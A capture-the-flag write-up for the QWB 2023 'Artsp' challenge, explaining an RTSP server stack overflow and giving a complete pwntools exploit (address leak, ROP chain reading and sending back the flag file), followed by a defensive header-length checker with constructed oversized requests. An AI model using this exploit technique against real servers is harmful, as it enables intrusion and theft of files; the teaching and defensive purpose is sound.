
qwb2023_Artsp

First, GET_PARAMETER leaks an ELF address, which defeats PIE for the rest of the chain.

Next, SET_PARAMETER sets the flag that the later request will be checked against.

Finally, DESCRIBE first checks the flag set in the previous step; only then does it reach the vulnerable copy, which causes a stack overflow.

When constructing the payload, note that the array index v11 is itself overwritten by the copy. So when the copy reaches v11's position, overwrite v11 so that dest[v11] points at the function's saved return address on the stack; the bytes that follow are then written there as the ROP chain.

```python
#coding:utf8
# Python 2 / pwntools exploit script from the writeup (str payloads, print statements).
from pwn import *

#ip = '192.168.190.132'
#port = 8554

ip = '8.147.131.244'
port = 28951
sh = remote(ip, port)

url = 'rtsp://%s:%d/wavAudioTest' % (ip, port)

context.log_level = 'debug'

# Step 0: SETUP to obtain a session id that the later requests must carry.
payload = 'SETUP %s RTSP/1.0\r\n' % url
payload += 'CSeq: 1\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Transport: RTP/TCP;unicast;client_port=49792-49793\r\n'
payload += '\r\n'
sh.send(payload)

sh.recvuntil('Session: ')
session = sh.recvuntil(';', drop=True)

# Step 1: GET_PARAMETER leaks an ELF address; subtract the known offset to get the base.
#raw_input()
payload = 'GET_PARAMETER %s RTSP/1.0\r\n' % '*'
payload += 'CSeq: 2\r\n'
payload += 'GET_INFO: 2023\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)
sh.recvuntil('this ')
elf_base = int(sh.recvuntil('\n', drop=True), 16) - 0x2a9990

# Function and gadget addresses, all relative to the leaked base.
fopen_addr = elf_base + 0x18090
read_addr = elf_base + 0x18200
send_addr = elf_base + 0x2949D
pop_rdi = elf_base + 0x000000000007b133
pop_rsi = elf_base + 0x0000000000099fb0
pop_rdx = elf_base + 0x0000000000019eaa
pop_rax = elf_base + 0x0000000000035e4a
flag_addr = elf_base + 0x7B3E5   # path string for the flag file
mode_addr = elf_base + 0x1467    # fopen mode string
buf_addr = elf_base + 0x2A9990   # writable scratch buffer in the binary

print 'elf_base=', hex(elf_base)
print 'fopen_addr=', hex(fopen_addr)
print 'read_addr=', hex(read_addr)
print 'send_addr=', hex(send_addr)

# Step 2: SET_PARAMETER sets the flag that DESCRIBE checks before reaching the vulnerable code.
payload = 'SET_PARAMETER %s RTSP/1.0\r\n' % '*'
payload += 'CSeq: 3\r\n'
payload += 'DESCRIBE_FLAG: qwb\r\n'
payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)

sh.recvuntil('202 OK')

# ROP chain: fopen(flag_addr, mode_addr); read(8, buf_addr, 0x30);
# then rax=5, rsi=buf_addr, rdx=0x30 and a call to send_addr to return the buffer.
rop = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(mode_addr) + p64(fopen_addr)
rop += p64(pop_rdi) + p64(8) + p64(pop_rsi) + p64(buf_addr) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
rop += p64(pop_rax) + p64(5) + p64(pop_rsi) + p64(buf_addr) + p64(pop_rdx) + p64(0x30) + p64(send_addr)

# Override the 2-byte index v11 once the copy reaches it, so that dest[v11]
# points at the saved return address; the ROP chain is then written there.
pay = 'a' * (0x198 - 0xc) + p16(0x1a8 - 0x2)
pay += rop

# Step 3: DESCRIBE with the oversized header value triggers the stack overflow.
payload = 'DESCRIBE %s RTSP/1.0\r\n' % url
payload += 'CSeq: 4\r\n'
payload += 'vul_string: %s\r\n' % pay
#payload += 'User-Agent: LibVLC/3.0.18 (LIVE555 Streaming Media v2016.11.28)\r\n'
#payload += 'Session: %s\r\n' % session
payload += '\r\n'
sh.send(payload)


sh.interactive()
```
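From the defender's side, the root cause above is an RTSP header value copied into a fixed stack buffer (with the loop index living in the same buffer) without a length check. As an added example that is not part of the original writeup or of the challenge binary, the following bounded request check rejects oversized or non-printable header values before any handler sees them; the limits `MAX_LINE_LEN` / `MAX_VALUE_LEN` and the sample requests are constructed assumptions for illustration.

```python
import re

# Assumed bounds (illustrative): the value cap sits well below the 0x198-byte
# stack buffer seen in the writeup, so an over-long header never reaches the copy.
MAX_LINE_LEN = 256
MAX_VALUE_LEN = 200

REQUEST_LINE = re.compile(rb'^([A-Z_]+) (\S+) RTSP/1\.0$')


def check_rtsp_request(raw):
    """Parse one raw RTSP request. Returns (method, headers, problems);
    method is None when the request line is malformed. A non-empty problems
    list means the request should be dropped and logged, not dispatched."""
    problems = []
    head, sep, _body = raw.partition(b'\r\n\r\n')
    if not sep:
        problems.append('missing CRLFCRLF terminator')
    lines = head.split(b'\r\n')
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None, {}, problems + ['malformed request line']
    method = m.group(1).decode()
    headers = {}
    for line in lines[1:]:
        if len(line) > MAX_LINE_LEN:
            problems.append('header line of %d bytes exceeds %d' % (len(line), MAX_LINE_LEN))
        name, colon, value = line.partition(b':')
        if not colon:
            problems.append('header without colon: %r' % line[:20])
            continue
        key = name.strip().decode('ascii', 'replace').lower()
        value = value.strip()
        if len(value) > MAX_VALUE_LEN:
            problems.append('%s value of %d bytes exceeds %d' % (key, len(value), MAX_VALUE_LEN))
        if any(b < 0x20 or b > 0x7e for b in value):
            problems.append('%s contains non-printable bytes' % key)
        headers[key] = value
    return method, headers, problems


# Constructed sample requests (not captured traffic).
BENIGN = (b'DESCRIBE rtsp://example.invalid/wavAudioTest RTSP/1.0\r\n'
          b'CSeq: 4\r\nUser-Agent: test\r\n\r\n')
OVERSIZED = (b'DESCRIBE rtsp://example.invalid/wavAudioTest RTSP/1.0\r\n'
             b'CSeq: 4\r\nvul_string: ' + b'A' * 0x198 + b'\x00\x11' + b'\r\n\r\n')

if __name__ == '__main__':
    for req in (BENIGN, OVERSIZED):
        print(check_rtsp_request(req)[0], check_rtsp_request(req)[2])
```

On the constructed input the oversized request is flagged three times (line length, value length, non-printable bytes) while the benign DESCRIBE passes cleanly.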